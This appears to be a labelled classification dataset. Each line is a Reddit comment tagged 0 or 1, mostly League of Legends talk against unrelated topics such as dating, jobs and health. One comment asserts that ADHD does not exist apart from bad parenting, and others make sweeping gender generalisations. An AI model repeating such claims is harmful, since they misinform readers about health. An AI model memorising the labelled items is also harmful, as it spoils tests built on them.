1	Asbestos and lead-based paint used to work very well in homes. It was the norm, and it was what people expected. Airplanes used to be scary. People avoided them. Going with what is tried and true only slows progression in all forms. Ingenuity is what made our race so amzing. Did you know when pencillan came out, it was widely rejected?
1	I honestly didn't care about the whole situation, as long as people will get their prizes. There still isn't enough evidence either way to suggest its true one way or the other, ultimatly I give some credence to the suggestion that many prizes havn't been sent out and have been continually delayed. At the same time I never felt it was fair to grab my pitchfork, because I know how razer sets up contracts, and if protato was committing fraud, then its going to be lots of civil and potentially criminal legal problems, not problems from reddit that he faces. Razers lawyers alone would mount tons of civil claims.
0	Do you actually ask them out?   Seriously. Just ask them out.   Don't be creepy, don't be annoying.  Don't  wait so long that they only really think of you as a friend and miss your intention when you ask the question. Just go with "hey would you like to get a coffee some time?" (or dinner or a movie or whatever). If they say yes? Maybe it goes somewhere. If they say no, move on.   If you are asking them out and always being told no? Look at yourself. Seriously. What are your flaws and what can you fix? Are you unattractive? 95% of 'unattractive' people become vastly more attractive if they eat healthy and exercise. Years ago when I was in my final year of my degree, "health" was not something I was real concerned about. Late nights, shitty food and no exercise? I weighed in at about 110kg. Now I'm no model, but I can tell you I'm far more attractive at my current weight of around 80kg than I was then.   Doesn't just apply to fat people either. Do you look after yourself and your appearance? Do you dress well and appropriately for your body type? Do you groom yourself properly? A decent haircut and a shave will do wonders - if you can rock a beard attractively then cool, otherwise lose it. Get input from your female friends about what works for you, I'm sure they'll be happy to help.   No problems physically? Ask your real friends - the ones who will give honest answers: "What are my annoying personality traits?". We all have them and usually people learn to accept them, but people who wear them on their sleeves tend to be the ones nobody can stand. I for example have a bad habit of lecturing people (see: this post). I do it in real life, all the time. My friends don't overly care, but if I'm meeting new people I do make a point of reining it in a bit.. because I don't want one of my more annoying habits to be my first impression.   The
1	That is a very very difficult attitude to maintain imo. I've played video games for 15 hours a week minimum and I find that sometimes playing to improve isn't enough to get me to play a game at all. Sometimes the only motivation i have to play league is to get ip or lp in order to rank up. Or if a new champion comes out. But for players that can't play at all and specifically take time out of their day to play only 1 game it's very frustrating. You can hardly improve at all with 1 game a day, and if you do improve you would have to be playing the same champion every day for it to even be effective. We humans love feeling that our time was well spent, and that is very hard when you are pressed for time and things go sour. If his goal IS to climb the ladder then he has to realize his intentions are misplaced. Goals you place in a video game are your own, not the communities. Maybe he's diamond 5 and very skillful? Gaining lp is one of the few reasons he plays?
0	Fellow bro here. Had a similar experience on two occasions. Neither had to do with being nervous but rather that I was getting out of a dry spell both times and had been furiously masturbating almost daily. In both situations the girls were obviously miffed but each in turn took it as a personal challenge rather than an insult. So I stopped baitin and then next time they got me off in a matter of minutes. Girls happy, me happy, orgasms all around.
0	Because they're easier to expand with  Reddit Enhancement Suite  video in another tab/window.
1	He's actually giving you the most efficient way to rush 30, and from the tone and reactions you're giving off, you have the money to spend that you made at your super fast paced high paying job.   Hes giving you an out to your, "time wasted", conundrum by informing you of how you could rush 30 about 5x faster than a highschooler grinding out normals.
1	Watch SIV HD´s aftermovie of him getting donations for children in africa.   > "The League community isn't bad. We need to stop judging it just from seeing some bad apples"     not the exact words but i don't have access to youtube right now.     Also Athene agreed on that even though he always used to call the community toxic.   The easy way to get a better community is by starting at yourself. Be nice even if someone makes fun of you.   Example from one of my games yesterday   I just love VI's laugh so i used it a few times on lv1 just to get pumped up for the match. In that moment annie ^sup ^ofc ^^cause ^^worlds got hooked by thresh and killed. She assumed that i laughed  because  of that though that i didn't.   Annie and her Teammate decided to flame the living shit out of me and make fun of me. I went like 7/0/8 in that game and helped their lane though that they would make fun of me whenever i missed a single q and permanently ping spammed me for no reason at all.   Later in the game when we got dragon, 3 kills and 2 turrets in ~50 sec i said "super nice job team".   The premades at bot decided to spam the chat with "super" in front of anything they write.   > "super gj guys" - "yeah super amazing" - "man super cs you got there"   Instead of crying like a bitch i just wrote a smiley " :D " and also wrote "super" in front of anything i wrote. So did the other 2 Teammates.   At the end when we won like 25/4 i reported them and got honored as "friendly" by one of my mates.
1	What?  Crumbzz and scarra were the ones that carried Dig to 2nd in NA Regionals and proved to be arguably the best top laner NA.  This isn't mentioning he had more success in tournaments as top than jungle and this being that his style of jungling was out of the meta at the time.   Oh ya, he was probably a mid laner just as long as a jungler.  This being said he has shown that he is quick at adapting, so the major changes in the jungle might prove to be an advantage for him.
0	Everyone in this thread that is ignorantly talking about signal timing should at least read the [wikipedia page]( Im a Civil Engineering student and I can tell you from my brief introduction to signal timing so far it is the cheapest and most effective way to manage intersections throughout the day.  Most signal cycles are 2 min or less so if you get fed up at a light listen to a song on the radio. Chances are you probably will get through the light in under one song.  Maybe two if you get caught up in a queue.  Sure it is easy to say "throw super expensive sensor systems on every light" but that is an ignorant statement.  The amount of monitoring technology needed to do this would be absurd.  The computer would need to know how many cars were in each lane in each direction of traffic currently stopped at the light and heading towards it.
0	Hey I apologize for taking so long to respond, and I don't think I'm the one to enlighten you. It's just that as I grow older I find there's plenty of jobs with an equal distribution of pay, entertainment, and boring paperwork. When you reach a point boring things like paperwork are just things you have to do. It's not as simple as a straight up love hate thing.
1	Bcos riven is ridiculously inbalanced,no other hero can build all AD and still be that mobile and difficult to kill, as well as the amount of range she has when she is a melee champ is ridiculous. The Most average riven players can wreck almost anyone on almost any champ, and as such they think they are god's gift to league of legends, they are the most skilled player in the game and you should be thankful that you were gifted the opportunity to have them on your team, or in the other case you should accept your a worthless "Noob who doesn't deserve their elo" or should "sell thier skin" If you are against them and your team can't afford to have the jungle permanently in her lane to avoid her being able to 1 v 29,000000.
1	Exactly I play with a friend who just reached level 30 recently, which lets face it probably are just slightly worse than these guys most likely. Its not difficult at all to Penta a team of guys who don't know how to deal with fed hyper carries yet. Even from only a tier-tier and a half gap I feel like I'm expected to trash the people I play against when I play with him. Its often where I often put myself at a disadvantage so I don't get massively ahead to the point of no return or I play an off role. Why ruin someones experience by flat out ram rodding them when they're just trying to have fun
0	I delivered pizzas for a semester when I was in university, worst job ever. I always tip delivery people extra well now that I know what a shitty job it is. I have all sorts of insane stories from doing it for just one semester, most notably - I had to give a police report because I showed up to deliver a pizza and got caught in the middle of a HUGE domestic dispute. Ex girlfriend showed up and started smashing all the guy's windows with a golf club and I had to hide inside and wait for her to leave. Dude still paid for s pizza, tipped really well, and was really apologetic about it which was nice...
1	i feel like they dont even know wtf
0	Not at all as cool, but I'd like to share it!   Was driving by a traffic light and saw a car on the side of a main road. It was as I figured - the car ran out of gas and I saw a man walking by himself about 20ft ahead of the car in 20 degree weather with a bad wind chill.   I pulled over immediately, welcomed him in my car, drove him to a gas station where he filled a gas container, drove him back to his car, and waited for him until he started his car.   His hands had gas and I gave him sanitizer. As he reached for his wallet, I said, "Today you. Tomorrow me." He responded, "I just helped someone out with the same thing the other day." We then parted. Felt great.
1	thread.   can we please stop upvoting a guy that litterally just says "we all understand that the system is broken and needs to be fixed" when really nobody of the upvoters or the poster himself "understand" any of it? challenger does have problems, OP's is none of them.   > your mmr needs to be higher than #50 in order to come into promo.     wrong. your mmr needs to be higher than #50  and everyone that is currently in promo .     > after reaching promo you can just wait till 7 days before the end of the season in order to get a guaranteed spot in challenger.     wrong. you only have 5 days time to play your max. 5 games or you don't get promoted. so every wayne that makes it to promo already proves himself to be worth the challenger title. the promo itself (like in every other promo) just makes sure you didn't come there by a lucky winstreak.
1	A psychologist is just a man or woman who TALKS to people and tries to help their mental state.  Esports players dont NEED professional psychologists to help them, they just need what all human beings need- some kind of support.   Sure, a psychologist would be ideal for this role, as they are trained in the art- however, a full-time team psychologist would probably demand a higher salary than most of the players.  Given the size of the e-sports industry, I don't think this is a financially viable option for 90% of teams   So, we dont NEED psychologists, but they certainly help.  Only reason athletic sports teams have them is because.... they can afford them!   instead of having a psych actually on-staff, perhaps the teams can just pay for weekly/monthly appointments if they see the value.  idk about you, but for 100k a year I'd rather fly in a couple koreans for the roster instead of a team psych
1	To be very clear, the OP is requesting that characters that already have functionality tied to a toggle functionality:   "/taunt" or ctrl+2   Have it tied to a different toggle, without saying the text that comes with it:   "/toggle" or ctrl+5
1	I've always wondered about this.  A duo top lane vs 1 can easily stop the one dude from farming (like 0 farm), while almost guaranteeing they get first tower.  Even if ganked, it's more than likely the 1 person is low on health from being harassed, and a fair fight for the 2 man lane.  In DotA there's even tri-lanes, I think it could be viable if you know your other lanes can win or at least tie.
1	Vayne has a shorter range than most of the AD carries, though bigger than Urgot's. The thing with Vayne is that she can, theorically, use her Q and dash every 2_3 seconds. This is how you kite people. But most of the time you won't just try to kite depending on your opponent. Vayne's playstyle is very passive, people may think she is aggressive as fuck. But no.   First of all skill order : Don't take anything until 2 if nothing happens, you don't know what you'll need. But if everything rolls fine (u can farm, no big aggression etc) just take Q then E. You HAVE to max E first. This is why vayne is kind of passive. Basically during lane phase you'll have to farm like crazy all day long, and EVENTUALLY, if someone of the botlane misposition (in a position where u can stun him with E and deal double damage, next to a wall, or if you see a good opportunity flash to position yourself to put him in a wall if not too dangerous etc..) just engage, deal damages, and if you see that your burst is too low, don't keep up, because when you burnt ur E, u don't have much left. If you have your ulti and someone missposition, that's a FREE KILL. I can guarantee it to you. Depending on the support you're facing ofc. When mid / late game arrives, you should have bought your first item: black cleaver and berserker greaves. At this point check what you need : If you're having a hard time dealing with the ennemies, just get lifesteal (wriggle's is fine if there are lots of ADs (i.e : jungler solo top ad carry are all AD), otherwise if there are lots of health go for madreds.. if squishies go for triforce, and if mixed just go phantom dancer. I think that's it.
0	Actually the boy grew up with me and is now in his mid 20's and would be hard to tell that he has autism.   They aren't abusing their kid and I don't see it that way. You can tell little Johnny "You are special you have autism, unlike the other boys and girls you will need to work harder" and "Oh you have autism Johnny, it's okay to fail, you just have to realize that you cannot do things like other boys and girls" sounds pretty good to me, doesn't it? Wrong. Again his parents raised him with his two other brothers to be normal, not to be the "special" kid. That is how they saw it. They didn't stunt is growth. They didn't harm their kid, but I guess in this day and age where others tell parents how they should raise their kid instead of minding their own business leads us to Teachers having to use purple pens instead of red ones b/c it would hurt Little Johnny's feelings. Here's a hint, have Little Johnny study harder so he wouldn't have to get his paper marked up. We are now in the age of participation awards and blaming acronyms for kid's failures (ie ADHD, ADD) b/c the lack of parenting or bad parenting.   My kid will be raised to not blame anyone or anything for his failures. He will ask why that other loud and annoying kids are being allowed to be little shits b/c their parents put their kids on medication for something that doesn't exist. ADHD only exists when parenting doesn't. People can make up science to justify the means for you that will argue with me.
0	This. I'm 25, graduated in May 2009 almost exactly 3 years ago. -First job was hell on earth, in my field working as a contract employee through a second party but only very loosely related to my expertise.  -Second job was a small promotion through the same contractor and was still bad but paid more and had some more responsibility.  -Third job was a serious promotion and carried a lot of responsibility, managing and tracking all of the materials for a large Telco project spanning a ton of territory (4-5 cities), but still working as a contractor for the same major telco.   This was all within a span of about two years, done by excelling at each new task even though a lot of it felt useless or mundane at the time. Truth be told, people DO take notice of things like that. One day at my desk, two guys I'd never seen before came up to me and asked if I could take a few minutes to speak with them upstairs. Turns out they were giving me a job, within the Telco itself, no more contract work, full benefits, big salary, precisely what I pictured myself doing for a career when I graduated from engineering two years before. They had asked around and already had all the info about me they needed from other inside people who had worked with me on the project I was contracted on.   I distinctly remember the phrase "It's up to you of course, but we highly recommend you take this position" being uttered before we were 5 minutes into the informal chat that passed for an interview.   Point being, I've now been in a job I love for almost a year, that has amazing prospects for advancement (these days, if you get into a company young, chances you're in perfect position to be at the top in 10-15 years because there's an entire generation that's about to retire), security, and compensation. And I didn't get there by turning down opportunities, no matter how lame they seemed at the time.   Disclaimer: Please make sure you're in the right industry for this. Obviously this does not apply to working at McDonalds part time with your business degree. Chances are head office is not going to come looking for you due to your skills with the register. But in engineering or business or sciences or even some of the arts, being someone's bitch for a while and earning next to nothing is your  foot in the door . I can't stress enough how important that is. And once it's in there, take any opportunity to make yourself visible, by attending meetings, voicing opinions when the chance is there, whatever.
1	Ok I might be the only one here thinking that way but...   Holy shit I enjoyed that game so much, ok Elements lost but they were never ahead in gold anyways. They did have all the makings of a victory though.   Thing is I still think they played a great game and I really enjoyed watching it. They no longer passively wait things out, they finally grow balls and go in fucking deep.   To all you fuckers bashing Wickd (nope I'm not even an Elements fan) have you ever thought that his Rabadons pick up was intentional because Froggen went to more of a dive build, with less AP, so he would stick the targets to where they are and Wickd lays down crushing ults (what he actually did)? Sure sorc shoes + guise is standard but well I think they had a thought process behind and it worked early.   Same goes for the shook bash now, you flame him for months, writing he's utter shit and inconsistent, then he mans up, fails like every sportsman from time to time does and you flame him again? WTF he was there keeping Elements relevant early/mid game in the firs place!   Heck you can play well (fight for your life) and still lose.
0	Ok to distinguish between what some posters have said about how to handle the situation of what to do about pho-friends. I have seperate groups of friends who live at opposite ends of the spectrum. One of the groups shares interests with me more so than a strong friendship like my life long friends do. Within the shared intrest group we smoke, listen to metal, watch fights but I have always noticed that I am kind of the black sheep in the group when we hang out. The one that is on the fringe of the conversations or the guy on the outside of the inside joke (seemingly so). I consider myself to be a fairly good judge of character and motive and notice small things. I am not sensitive when it comes to back and forth joking, especially with my life long friends. However, when it comes to the "other" group it always seems that instead of joking to my face or just playing around they constantly make comments under their breath or speak with veiled intent which for the most part i see through, which is annoying cause i can't tell if they aren't whitty enough to secretly make fun of me without me knowing or they are somehow thinking i should laugh at the fact they are trying to secretly make fun of me. Long winded problem with a obvious answer, right? Just ditch those guys. Well it's not that easy because of our joint lifestyle, pun intended. I have shared risk by endangering that "friendship" due to the fact we smoke which puts me at risk along with them, and despite the unspoken rule of never turn on a fellow ent, who can you really trust with your life? This is all my fault for getting in this deep but I am tired of being berated but at the same time I can't just up and leave, or to me it appears that way. I almost always defer to the most logical decision in situations so i can take it if it turns out maybe i need to just do some self-examination, maybe im the problem. I honestly do my level best to be friendly and kind to others, even in excess sometimes to my own detriment. Does anyone have any solutions for my situation?
0	Oh, what's that? You think I'm not a real woman because I'm a lot thinner than you? Bitch, please. I lift heavy boxes all day long without a care in the world, and I can walk ten miles straight without a problem on a really good day. The only days that aren't good days are the ones I happen to be "sick". All the while you're stuck on your comfy couch, unable to do much more than walk for fifteen minutes without a break. Oh, you're just tired from your long days work sitting down at the office? (Note: I'm not implying that office people don't work hard. Actually I know a few that work even harder than I do.) I spent nine hours on my feet doing physically oriented work, trying like mad to keep up with all of the work coming at me. After I went home, I still decided to walk a few blocks for my soda, because why the fuck not? You might be tired from working all day. Hell, you probably are. But if you're going to let that stop you from at least trying to move a little on the weekends, don't go blaming me because I'm the one who just got wolf whistled at and told I had nice legs. Get a life you say? I have a great one already, thank you very much. Do you have any idea how nice it is to realize you just took six hours to figure out you woke up with a cold because the only symptoms you have is a little extra bit of tiredness and a weird stuffy feeling in your head sometimes, and maybe a runny nose if it's a "bad" one? Your cold wasn't even the flu (at least that's what she said her doctor told her) and yet you were stuck home from work for an entire week. You really think being overweight isn't a problem? Can't you see how it's affecting your life, how you're slowly destroying yourself from the inside out by refusing to admit you have a problem? Of course not. Denial doesn't allow for that. You'll have to reach an ugly breaking point before you do, and it either won't happen or will cause quite a mental turmoil for you when it finally does. Oh, well. There's nothing I can do about it if you won't listen, so rather than take your shit I'm just going to avoid you and let you do your thing.   Yeah, I know someone like that too. And yeah, I'm a little bitter about it. She was a great friend until her ego swelled up. At least I had the sense to move away when I realized my involvement would only hurt me in the long run.   Now, that's not to say I think all fat people are in denial and need to rethink their lives. My mother has been trying her hardest to lose her weight, and is somehow managing to do well despite being on a medication that makes losing weight almost impossible. I'm also not saying all skinny people are healthy and happy like I am. I knew a skinny girl in high school with some of the worst depression issues I'd ever seen, and most likely anorexia or bulimia. All I'm saying is that I wish more people would pull their heads out of their asses and think for a second before they start taking their problems out on other people.
1	I agree with you entirely. Play to your teams strength. I'm weak both Mid and ADC, however I'm solid in Support, decent in the Jungle and okay at Solo Top. Putting me in to a Mid or ADC position is just asking for that tower to fall first. It's not that I haven't tried to get better at Mid or ADC, I'm just not good in those positions. Since my early days of playing multiplayer games, I have always found myself drawn to the supporting roles. Does this make me a bad player? I'd like to think not. Mostly because there are few people who can really appreciate the supporting role and enjoy playing it. I'm not at ranked yet, however, I have made huge plays in the Support role, just by giving out Top or ADC that little boost of Health or Mana while playing as Soraka.
1	The post doesn't say whether Promise is or isn't in trouble.  Someone not the OP put that in the
1	people make up persona's all the time.... sometimes it's a psychological thing other times it's because they feel their normal persona doesn't qualify them for what they're doing so they create a persona that does.  Athene hasn't harmed anyone... he may be verbally toxic but in nature he's a good person (you cant stream for charity for so long without being a good person) he's also an actor, he created that persona so people like you could hate on him and he could tell himself that it's "Athene" they're hating on not him...
1	Has nothing to do with the subject as a whole... and wether means castrated male goat, so I guess I like goats.     He has a red beard I have a black beard.     People aren't flaming him, they're just disagreeing with his actions.     Your first bullet is toxic; practice what you preach.       TD;LR
1	All your points about Janna are true, but Janna is just in a terrible spot right now, so saying Thresh is better than Janna says nothing, because, shit,  Soraka  is better than Janna right now.   Thresh is not tankier than Blitzcrank. His hook hits for longer but it doesn't pull as far, nor does it pull over walls. Thresh's Flay is a hard-to-use skillshot vs. an Auto-attack modifier, and it costs a lot more mana than Power Fist. Thresh's hook has a bigger hitbox but a longer windup time. And again, Thresh's hook only allows him to pull people a short distance and then choose to go in himself. Contrast with Blitz's hook which pulls people all the way to him. If you nail a squishy with that hook you've just created a 4v5. Thresh has to potentially put himself in danger to get the most out of his Q.   Thresh's ultimate compared to Zyra's... is not even in the same ballpark.  Zyra's does damage immediately at activation and then knocks up, while also increasing the power of her plants in range. She can do this from 700 units away, farther than anybody can auto-attack. Thresh, on the other hand, has to be in the fray to use his ult, then has to hope his enemies hit the walls (or he Flays them into a wall). A full-team Zyra ult is FAR more impact-ful (and does more damage) than a full-team Thresh ult, and Zyra probably doesn't die afterwards, whereas Thresh has a much higher chance to die in the process.   While we're comparing Thresh to Zyra, let's talk about AA ranges! Zyra is so much better than Thresh because she can attack from so much farther away. Zyra is so much better than Thresh because her long-range skillshot is a multi-target snare that can pass through minions instead of a single-target stun that minions can block. Zyra is so much better than Thresh because she gets free plant-turrets to do damage for her and zone for her.   Your arguments show only one side of things. The truth is champions are different. Blitzcrank is better at certain things than Thresh (like pulling people over walls, creating 4v5's, running fast, doing AoE Silences, and taking down towers). Zyra is better at many things than Thresh, like zoning, doing Aoe damage from afar, CC-ing multiple people safely, and getting revenge after dying.
1	While this could be a good idea, I doubt they would change ohmwrecker like this. Remember, they just buffed towers not too long ago to try and prevent teams from being able to take towers in the first 3 minutes of the game. Giving yet another buff to towers via an item buff could potentially make games super long and boring since tower diving would be less rewarding and more dangerous. While you could say that this can be countered by buying an ohmwrecker, what's the point of the fortify active if it could just be canceled via another ohmwrecker on the opposite team? Finally, adding this active and reducing cost may result in supports rushing this item, making it way easier to pull of ridiculous tower dives in the beginning of the game with less consequences, and bringing back the problem of teams bringing down towers within the 3 minute mark on a regular basis.
0	i wish there were more teachers like you. good teachers don't get enough credit, and admittedly i forget the names of the really good teachers i've had. unfortunately the one i remember the most was the one that actually bullied her students.   she was this shriveled up little woman in her late 60s, and she taught 6th-7th grade english at my middle school. luckily, i had her both years and had her as my advisory class (class period when you can do whatever, kinda like a break between classes). she would literally break kids' self-esteems like it was her job. i was a pretty obnoxiously happy kid, but like all kids around that age i was very insecure and had low self-esteem. i quickly became her favorite target.   in one instance i remember i had a homework assignment due and i had forgotten to do it. she came over to my desk (i sat in the middle of the class) and took away the book i was supposed to be reading, and asked "where's your homework YodgeDurango?" this being after 2 quarters of bullying, i quietly responded "i forgot it -insert name-, sorry," at which point she started getting in my face and yelling at me about how stupid i was and how i wasn't going to amount to anything, in front of the entire class. i started tearing up and she started yelling at me about that, and about how much trouble i'd be in if i started crying. so i just sat there, crying as silently as i could, until she went back to her table. at this point the entire class was staring, and of course that didn't help my predicament. after class i called my mom and told her i was sick and went home.   that was 8 years ago, and that one of the few things i remember about middle school. that class fucked me up pretty bad emotionally. people like that shouldn't be allowed near kids, let alone teach them.
1	Dont build lich bane on ziggs! Its bad! To use lich bane you have to be in auto range which is a mistake. If the enemy doesnt kill you for that they are dumb.
0	Hi, 38 year old here. I guess I'm probably that generation you're talking about. I'm going to take a guess that you're somewhere between 18-25. You know what? At that age you're a fucking idiot who thinks they know it all and have all the right answers. At that age I'll admit, I was a complete moron. Pretty much everybody was, or is.   Now why am I telling you this? (Really, why am I telling you this? You probably think you know better than me and won't fucking listen to a goddamned thing I say.) Why would I think that you're still not as smart as you think you are? You see, you've been being educated in a specific path of thought and understanding. As a guess, you might even idolize people like Noam Chomsky, or Che Guevara and eat the peanuts out of their shit. You want do directly implement exactly what they've said in exactly the way they've said it. Well, guess what? Your ideal is impossible.   At your young age it is highly unlikely you understand the nuanced world of dealing with people that have different thought processes than you. Your bullheadedness will hinder, not help you. It will cause you to butt heads with people in charge, even if you do have the correct answer. Sure, maybe you can slip something past some old fart like me who isn't paying attention, but by and large you haven't grasped the big picture of whatever you're working towards. I'm sure you have plenty of book learning. The internet is an invaluable tool for educating yourself. But you have zero real world, practical experience. This lack of practical experience is what makes you feel superior to the generation before you. Your ignorance to what really has happened in your short attention span makes you think your predecessors are morons.   Take a good hard look at the creation and ingenuity that has happened during the previous generation's sphere of influence. What miraculous discoveries, like the internet, or the death of polio, or the mapping of the human genome, or robots on fucking Mars and tell me that you can do better. Look at what has come before and know that to beat us you need to do better. You have a tall fucking order and you better rise to the occasion bitch.
1	You lose every lane cause adcs are weak? You also play against adc which is skill matchup,
1	I feel like this sometimes too, but most of the time I feel like I either fuck up badly, and makes our chances of winning worse, or take my team on my back and carry them to victory, and neither of those are better options. Obviously when you do bad it's bad cus it affects your game in a negative way, but on the other side it openes up for improvement, and it's easier to become a better player and optimize your game. On the other side if you're doing better then most others, you're playing a game in which you don't belong, there's not much you can learn from to get better, and all you really get out of it is a victory. I always prefer loses where I do great above victories where I do awfull. Then we come to your situation, which I feel like is the ideal one. You're not doing bad, so it's not like you should feel awfull throughout the game, you're not doing amazing either, so you can always look for things to do better, it's like a heaven of perfection where you can chose and pick from what you want to do. Considering your amount of games and the fact that you have since silver felt this way about your games, it seems like you have a pretty even improvement curve. I think as long as you have a self critizising additude, whilst not being to offensive towards yourself, you will be able to do great in the ranking system, and keep improving (honsetly, if you constantly feel like you're not a big factor, negative or positive, you will be exactly where you belong).
1	Vi is still A class jungler with insane team fight potential its just that she was stupid stupid stupid broken OP for a while, now that she's balanced theres some FOTM champs that just bring so much to any team that she's just less popular overall. Also, I think a lot of it is to do with how well she herself duels against the FOTMs atm. Most of them can 1v1 her on an even footing or in the case of Nasus/Voli they can totally ruin her day and make her a liability in teamfights - She jumps into the middle of your team, after her ult finishes they disrupt her and kill her before her team engages properly.
0	It appears from your explanation that you may not realize how many indiviudals are  involved in getting that individual to the front lines.  Each and every one of those involved in supporting the person in combat are veterans because without everyone involved there wouldn't be anyone on the front lines.   Trooops in combat zones receive compensation that support troops do not.  In addition, some classifications for veterans include if they were in a war theater or not.
1	SOPA is a bit of a complex bill running through US Lawmakers and is explained sufficiently [in this video by TotalBiscuit](   GoDaddy recently said in a statement (I believe an official statement, not just some random tweet written by a "PR Proffesional) That basically even if SOPA is bad supporting it wont hurt their business, and they believe(d) that if it went through it would help their business.   Cue internet shitstorm as everyone wanted to prove them wrong; that supporting a bill as restrictive and evil as SOPA  would  in fact hurt their business as dozens of internet celebs and big-boys withdraw their sites from GoDaddy and move them to other providers, even at higher cost, simply because of their support of SOPA.   GoDaddy tries to cover face and do a complete 180 on their stance of SOPA, but the damage is already done, and I don't think many people want to go back to a company that both backed a terrible piece of legislation and then decides to just flip-flop when called out on it.
1	You can say that S2 has a bad rep or LoL has better advertising, but what it really boils down to is that LoL is the first moba that has an easy learning curve. Starting out you face people with similar skill base. In HoN everyone is better than you if you've never played a moba before.
0	Not sensible at all, just ignorant. The WBC would not feel bad at all and they themselves believe they are showing kindness to humans.   People really ought to read [their FAQ]( to get a better impression of their beliefs.   Why do you preach hate?   Because the Bible preaches hate. For every one verse about God's mercy, love, compassion, etc., there are two verses about His vengeance, hatred, wrath, etc.   We cannot know for certain that an individual person is in hell (or heaven). Only God knows that.   Why don't you leave it up to God and stop wasting your time telling people that they are wrong?   "The heart is deceitful above all things, and desperately wicked; who can know it? I, the Lord, search the heart, I try the reins, even to give every man according to his ways, and according to the fruit of his doings." (Jeremiah 17:9-10). This being the exclusive prerogative of God, we leave it alone, knowing that we can never convince someone that they are doing something wrong.   What we do is what we are commanded to do. There are two verses that show our commission well: "CRY aloud, spare not, lift up thy voice like a trumpet, and show my people their transgression, and the house of Jacob their sins." (Isaiah 58:1); and "Preach the word; be instant in season, out of season; reprove, rebuke, exhort with all long-suffering and doctrine." (2 Timothy 4:2). We preach.   What would you do if a homosexual attended your church?   Regardless of any person's private conduct, we would do unto them as we would have them do unto us. By a fear of God, we would declare the whole counsel of God to them, lest their blood should be on our hands. We would share the Gospel (good news) with them, and we would treat them like we would treat any other person on this earth. We would treat them with kindness, and follow those scriptural injunctions that require that we preach the gospel to every creature.   Do you feel that gays and lesbians should be allowed to teach if they do not bring their sexual tendencies into the classroom?   School is not a place for a teacher or any other tax-paid adult to be discussing, directly or indirectly, their sexual "preferences" or those of any other person. If such a person could and would go about their business in a professional, mature and responsible manner it would never be a problem.   Are you associated with a militia, Aryan Nation, Nazi, KKK, or any other similar group?   No. We don't believe in physical violence of any kind, and the Scripture doesn't support racism.   Are you a sinner? If so, does this mean you will burn in hell, or are you better than these people?   Of course I'm a sinner. All have sinned and come short of the glory of God, and if any man says he has not sinned he's a liar.  I am no better than any homosexual.   I think most people would be shocked to read that last part. The WBC are not so arrogant and hateful as people make out, they just believe in an evil God that fills them with fear. Here they are stating they are ok with gays, they just think God hates them, which is pretty justified by scripture.
1	Some months ago I played in a qualifier for one of the bigger 'local' tournaments organised so far. The team we played against had a full AD / bruiser team composition (I think they even had J4 support, but I'm pretty hazy on all the details anyway). Some bans were targeted against us and picks counters for what we usually picked, so we were grasping at straws every time it was our turn to pick a champ.   One of us jokingly remarked "they are all AD, we should pick Rammus" and then it dawned on us that he's actually a good choice all things considered. We couldn't squeeze him into the jungle since our jungler wasn't confident in his Rammus skills so our top laner (who used to be our jungler in S2) picked him top lane against Zed.   He then proceeded to absolutely  demolish  Zed in lane.   We couldn't stop laughing. It was actually unbelievable. Every time he forced Zed to go back or killed him, he'd just powerball over to mid and secure a kill by taunting their mid laner. He was virtually untouchable throughout the match and definitely carried us to victory.
0	Technically, yes, but for the most part no; BMI is simply a number that represents the relationship of OVERALL weight to height. You could be stacked with muscle and have a healthy fat % but still have an "obese" BMI of 30--however, I'm pretty sure this isn't the case for most people. Obesity is also associated with a bunch of other medical problems (diabetes, heart disease, hypertension, joint pain, etc.). You'd also put tons of pressure on your organs and probably get fatty buildup on them (i.e. liver and heart) which affects their ability to function. Physiologically speaking, I'd say "healthy" and "obesity" are mutually exclusive.   HOWEVER if you look at health from a view beyond the definition that health is "the absence of disease or dysfunction", then I suppose you could argue that a person could be both obese and healthy.   Body fat % is a more accurate measurement of "healthiness" than BMI, which just measures height vs. weight. The healthy range of body fat % varies with height, gender, and age.
0	This really gets me. My mom's boss (she's a dental hygienist and he's a dentist) checked out a chronic sore in her mouth for her, free of charge. When he realized it was a sign of something more serious, he sent her to the best oral surgeon in town the same day, also free of charge. This doctor ended up sending her to the hospital right away. As it turned out, she had undiagnosed leukemia. The next day, while in the hospital, her spleen burst (from complications due to the untreated cancer). If she hadn't gotten immediate medical attention for that, she would have almost certainly died. Three years later and my mom is in remission! I often think about how lucky we are that her boss genuinely cared about her well-being. I'm not religious, but the fact that my mom is alive today is an absolute miracle. One that her boss made possible.
0	I'd like to offer a fairly straight forward explanation. See men are typically direct. We say "hey you, you I like" and expect some sort of reciprocation. If the girl says "I like you, but as a friend" and we find it worth it, we go on as friends.   Ladies are not always very direct, though sometimes they are. So a girl that says "I like you, but as a friend" could mean it several different ways such as:     I'm just wanting casual sex right now     I'm not sure I know you well enough to date right now     I'm getting over a bad emotional issue     I'm focused on school / work / etc.. at the moment and dont want to waste your time     I'm actually really in to you, but telling you that would weaken my perception of you and I want you to figure it out     I think you're attractive enough to be seen with in public but probably not enough to have sex with until... oh damn that girls prettier than me and she likes you so now I do too     I really don't like you that much and really don't want to be friends, more like casual acquaintances     I really want to be your friend, though I have zero sexual attraction to you       Knowing this, the male will take 1 of 3 roads; attempt to be friends and carry on with his life, pretend to be friends while secretly trying to still hookup, walk away and not care. Ironically the 3rd action and the 1st are  often the most successful as they both show not caring, something that modern ladies are attracted too for some god awful reason until around their late 20's / early 30's. The described lady in this scenario is narcissistic, knew the guy liked her at one point, and now wants that power back, not happy that another girl is getting more sexually motivated attention and therefore sabotages all efforts. As catty as women can be, for some reason if a girl poses as a good / best friend of a guy and says something shitty about him the other girl almost never informs the guy and almost always trust her over the guy.
1	On a lower tier of play yes they are the same but when you get into the nitty gritty of mechanics they are very very different.   Graves is tanky with his passive and has a better time in the fray, denies you vision with his utility.  Lucian is mean to go in, then out, then back in again, then to the side, then back out and ult you to death utilizing the movement speed from his utility to keep him safe rather than straight up mitigating damage
1	Humans want the liberty to do w/e they want, if it's not available, its more desired. Thats the reason why guys are put in the friendzone, being available all the time takes the interest away.
0	The cheapest vodka I found in college was called Congress and it was $12 a handle. It was dangerous to buy not because it tasted vile or probably would make you go blind, but because a teammate of mine would go around slapping people screaming, "Congress is in session!" And then stick the handle in your mouth.
0	He's doing more than any other MILLION people will do, or can do. He's been so generous with his money that it's too bad he (OK, Microsoft, but still) had to waste so much on an army of lawyers back when they were targeted by good ol' Uncle Sam.
1	People like teams that win (which requires good coaching, which is only Regi), they like a team that networks with their fans (TSM streaming policy, thanks to Regi), and they like a team that won't collapse tomorrow (thanks to Regis money and his management, TSM is secure).
